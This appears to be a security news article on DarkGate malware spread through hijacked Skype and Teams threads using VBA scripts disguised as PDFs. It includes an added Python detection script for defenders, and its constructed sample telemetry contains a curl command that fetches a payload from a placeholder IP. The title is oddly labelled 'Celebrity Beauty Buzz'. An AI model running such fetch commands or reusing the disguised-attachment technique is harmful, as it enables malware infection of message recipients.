Title: Celebrity Beauty Buzz Faces DarkGate Malware Threat: Beware of Malicious Messages on Skype and Microsoft Teams
Subtitle: Cybersecurity experts warn of a surge in DarkGate malware spreading through popular messaging apps
DarkGate malware has recently become a growing concern for users of instant messaging platforms such as Skype and Microsoft Teams, according to cybersecurity experts. The malware is being spread through a Visual Basic for Applications (VBA) loader script that is named and presented so that it looks like a harmless PDF document; no flaw in any PDF reader is involved, the attachment is simply a script file with a misleading name.
When the recipient opens the supposed PDF, the script runs and immediately downloads and executes an AutoIt script, which in turn launches DarkGate. The accounts sending the messages are believed to have been taken over beforehand, through leaked credentials or an earlier compromise, so the malicious message arrives from a contact the victim already knows.
DarkGate is classified as commodity malware. It can harvest sensitive data, mine cryptocurrency, and give its operators remote control of infected hosts. Its use in social engineering campaigns has risen markedly, with phishing emails and SEO poisoning among the tactics used to get victims to install it.
DarkGate was previously advertised on underground forums and is now offered as a malware-as-a-service product, available for rent. That lower barrier to entry has contributed to the rise in its use and distribution.
Truesec, a cybersecurity firm, has observed the use of Microsoft Teams chat messages as a propagation vector for DarkGate. The majority of attacks have been detected in the Americas, followed by Asia, the Middle East, and Africa.
The Skype and Teams attack chain resembles a malspam campaign reported in August 2023; the key difference is the initial access route. Here the threat actors hijack existing messaging threads from compromised accounts and choose filenames that fit the conversation history, which is what persuades recipients to run the VBA script.
In a second variant, the attackers send Microsoft Teams messages carrying a ZIP archive that contains an LNK shortcut file. Opening the shortcut runs a VBA script, which then retrieves the DarkGate payload.
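As an added example (not code from Trend Micro, Truesec or the original article), the following Python sketch shows how both delivery chains described above can be recognised in process-creation telemetry: a script host (wscript.exe or cscript.exe) started by a chat client or handed a double-extension file such as "statement.pdf.vbs", followed by that script host spawning the AutoIt second stage. The event fields mirror a subset of Sysmon Event ID 1; the client binary names, all paths, PIDs and the sample events are constructed for the demonstration, and treating curl.exe and powershell.exe as possible second-stage fetchers is an assumption that goes beyond the AutoIt stage the page documents.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Process names are assumptions about typical client binaries, not from the page.
MESSAGING_CLIENTS = {"teams.exe", "ms-teams.exe", "skype.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# AutoIt3.exe is the second stage described in the report; curl.exe and
# powershell.exe are added here as assumed alternative fetchers.
STAGE2_IMAGES = {"autoit3.exe", "curl.exe", "powershell.exe"}
# "statement.pdf.vbs": a document extension followed by a script/shortcut one.
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?)\.(?:vbs|vbe|js|jse|wsf|hta|lnk)$", re.I)
# First script-like argument on a script host's command line, quoted or bare.
SCRIPT_ARG = re.compile(
    r'"([^"]+\.(?:vbs|vbe|js|jse|wsf|hta))"|(\S+\.(?:vbs|vbe|js|jse|wsf|hta))', re.I)


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 (process creation) fields."""
    pid: int
    ppid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def script_path(cmdline: str) -> Optional[str]:
    """Return the script file handed to wscript/cscript, or None."""
    m = SCRIPT_ARG.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def analyse(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) findings for the DarkGate-style delivery chains."""
    findings: List[Tuple[str, int]] = []
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    for e in events:
        parent, child = basename(e.parent_image), basename(e.image)
        if child in SCRIPT_HOSTS:
            # Stage 1a: a chat client directly launched a script host.
            if parent in MESSAGING_CLIENTS:
                findings.append(("script_host_from_messaging_client", e.pid))
            # Stage 1b: the script pretends to be a PDF/Office document.
            target = script_path(e.cmdline)
            if target and DOUBLE_EXT.search(basename(target)):
                findings.append(("double_extension_script", e.pid))
        if parent in SCRIPT_HOSTS and child in STAGE2_IMAGES:
            # Stage 2: the script host fetched/ran the AutoIt loader.
            findings.append(("script_host_spawns_stage2", e.pid))
            # Walk one level up: was the script host itself started by a chat client?
            host = by_pid.get(e.ppid)
            if host and basename(host.parent_image) in MESSAGING_CLIENTS:
                findings.append(("full_chain_messaging_to_stage2", e.pid))
    return findings


# Constructed sample telemetry (not real logs): two malicious chains, two benign events.
SAMPLE_EVENTS = [
    # Chain 1: Teams chat delivers "statement.pdf.vbs"; the recipient opens it.
    ProcEvent(4100, 3000, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\a\Downloads\statement.pdf.vbs"',
              r"C:\Users\a\AppData\Local\Microsoft\Teams\current\Teams.exe"),
    ProcEvent(4120, 4100, r"C:\Users\a\AppData\Local\Temp\AutoIt3.exe",
              r'"C:\Users\a\AppData\Local\Temp\AutoIt3.exe" C:\Users\a\AppData\Local\Temp\script.au3',
              r"C:\Windows\System32\wscript.exe"),
    # Chain 2: ZIP attachment extracted, the LNK inside runs a script from Temp.
    ProcEvent(5200, 1200, r"C:\Windows\System32\cscript.exe",
              r"cscript.exe C:\Users\a\AppData\Local\Temp\Rar$DI\invoice.pdf.vbs",
              r"C:\Windows\explorer.exe"),
    ProcEvent(5210, 5200, r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\Users\a\AppData\Local\Temp\au3.bin http://192.0.2.10/x",
              r"C:\Windows\System32\cscript.exe"),
    # Benign: a domain logon script, and a browser opened from a Teams link.
    ProcEvent(6000, 1200, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe \\corp\netlogon\logon.vbs", r"C:\Windows\explorer.exe"),
    ProcEvent(6100, 3000, r"C:\Program Files\Microsoft\Edge\msedge.exe",
              r"msedge.exe https://example.com",
              r"C:\Users\a\AppData\Local\Microsoft\Teams\current\Teams.exe"),
]

if __name__ == "__main__":
    for rule, pid in analyse(SAMPLE_EVENTS):
        print(f"{rule:36} pid={pid}")
```

The two rules worth paging on are the double-extension script and the script host spawning a second stage; the messaging-client parent rule is a corroborating signal, since a file opened from a chat may also be launched through explorer.exe depending on the client build, which is why the ZIP/LNK chain in the sample only trips the other two rules.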
Once installed, DarkGate can in turn drop further malware, including information stealers, ransomware, and cryptocurrency miners. Researchers warn that as long as external messaging is allowed, or the abuse of trusted relationships goes unchecked, the same technique works with any instant messaging app.
As the threat continues to grow, users of Skype and Microsoft Teams should treat unexpected attachments and links with suspicion even when they arrive in an existing thread from a known contact, since that contact's account may be the one that was compromised; a "PDF" that Windows reports as a script or shortcut file should not be opened. Administrators can reduce exposure by restricting or allowlisting external (federated) access in Teams and Skype, blocking script and shortcut file types delivered through chat, and enforcing multi-factor authentication so that leaked credentials alone cannot take over an account. Keeping endpoint security software up to date adds a further layer of protection.
Stay informed and stay safe, as the battle against DarkGate and other emerging malware continues.